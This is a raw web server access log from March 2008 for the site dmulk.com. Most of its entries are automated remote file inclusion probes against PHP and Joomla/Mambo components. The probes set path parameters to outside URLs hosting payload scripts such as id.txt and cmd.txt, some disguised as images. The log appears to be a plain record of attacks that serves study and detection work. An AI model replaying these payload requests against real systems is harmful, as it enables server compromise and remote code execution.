209.213.118.13 - - [13/Mar/2008:08:53:51 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:08:54:43 -0700] "GET /logs/access_080211.log//mcf.php?content=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:08:54:44 -0700] "GET //mcf.php?content=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:08:54:44 -0700] "GET /logs//mcf.php?content=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.39.103 - - [13/Mar/2008:08:54:50 -0700] "GET /logs/access_080204.log//calendar.php?pftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.39.103 - - [13/Mar/2008:08:54:51 -0700] "GET /logs//calendar.php?pftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:08:55:11 -0700] "GET /logs/access_080117.log//mcf.php?content=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:08:55:45 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://anakdompu.by.ru/maniez.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:08:57:37 -0700] "GET /logs/access_080225.log/inurl:amemberhttp://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:08:57:37 -0700] "GET /logs/inurl:amemberhttp://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:08:57:39 -0700] "GET /logs/access_080207.log/!scanhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:08:57:39 -0700] "GET /!scanhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:08:57:40 -0700] "GET /logs/!scanhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:08:57:42 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:08:57:42 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [13/Mar/2008:08:57:51 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.38.4.3 - - [13/Mar/2008:08:57:51 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:08:58:17 -0700] "GET /logs/access_080225.log/!scanhttp://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:08:58:28 -0700] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:08:58:28 -0700] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:08:58:29 -0700] "GET /logs/access_080122.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:08:58:58 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:08:59:03 -0700] "GET /include/functions_common.php?gl_root_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:09:00:23 -0700] "GET /logs/access_080122.log/inurl:amemberhttp://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:09:00:28 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:09:00:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:09:00:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.partybandflashback.nl/administrator/components/com_peoplebook/Adam.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:00:52 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:00:52 -0700] "GET /index.php?redir=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:00:53 -0700] "GET /logs/index.php?redir=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:02:08 -0700] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.tat.me.uk/vwar//docs/mic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:02:09 -0700] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://s86960043.onlinehome.us/poll/image/green1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [13/Mar/2008:09:02:54 -0700] "GET /%030http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
84.18.207.65 - - [13/Mar/2008:09:02:54 -0700] "GET /logs/%030http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:09:03:43 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:09:03:43 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:04:21 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:04:21 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.233.159.58 - - [13/Mar/2008:09:08:07 -0700] "GET /logs/access_070804.log HTTP/1.1" 200 28778 "-" "Mozilla/5.0" "www.dmulk.com"
148.233.159.58 - - [13/Mar/2008:09:08:07 -0700] "GET /logs/access_070823.log HTTP/1.1" 200 56843 "-" "Mozilla/5.0" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:09:09:44 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:09:09:44 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:09:10:33 -0700] "GET /logs/access_080122.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:11:13 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://anakdompu.by.ru/maniez.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:11:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://anakdompu.by.ru/maniez.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:11:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://anakdompu.by.ru/maniez.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:11:20 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://anakdompu.by.ru/maniez.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.254.214.3 - - [13/Mar/2008:09:12:35 -0700] "GET //?pg=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:20 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:20 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:22 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:22 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.31.196.16 - - [13/Mar/2008:09:14:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.241.32.143 - - [13/Mar/2008:09:14:33 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [13/Mar/2008:09:14:35 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
213.193.215.56 - - [13/Mar/2008:09:14:39 -0700] "GET //eva/index.php3?perso=http://www.tovr.com/images/id.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.193.215.56 - - [13/Mar/2008:09:14:39 -0700] "GET /logs//eva/index.php3?perso=http://www.tovr.com/images/id.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:16:17 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:16:18 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:16:19 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:32 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:32 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:33 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:33 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:34 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.16.145.244 - - [13/Mar/2008:09:16:34 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:19:35 -0700] "GET /logs/access_080211.log//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.tat.me.uk/vwar//docs/mic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:19:39 -0700] "GET /logs/access_080211.log//com_bsq_sitestats/external/rssfeed.php?baseDir=http://s86960043.onlinehome.us/poll/image/green1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:19:39 -0700] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.tat.me.uk/vwar//docs/mic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [13/Mar/2008:09:19:40 -0700] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://s86960043.onlinehome.us/poll/image/green1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.138.51.197 - - [13/Mar/2008:09:19:45 -0700] "GET /logs/access_080207.log/favorites.php?nuke_bb_root_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [13/Mar/2008:09:19:46 -0700] "GET /favorites.php?nuke_bb_root_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [13/Mar/2008:09:19:46 -0700] "GET /logs/favorites.php?nuke_bb_root_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:20:36 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:20:36 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:21:02 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.186 - - [13/Mar/2008:09:21:35 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://ehlcc.com/administrator/modules/pro/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.246.98.186 - - [13/Mar/2008:09:21:35 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://ehlcc.com/administrator/modules/pro/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.218.85.18 - - [13/Mar/2008:09:21:49 -0700] "GET /logs/access_080124.log/index.php?redir=http://www.dd3str0y3r.kit.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [13/Mar/2008:09:21:58 -0700] "GET /logs/access_080104.log/favorites.php?nuke_bb_root_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.207 - - [13/Mar/2008:09:22:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [13/Mar/2008:09:22:37 -0700] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:09:22:51 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:09:22:52 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.69.76.93 - - [13/Mar/2008:09:23:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "mediohbot" "dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:28 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:28 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:33 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:33 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:34 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:34 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:38 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:23:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:09:23:56 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:09:24:01 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:01 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [13/Mar/2008:09:24:02 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
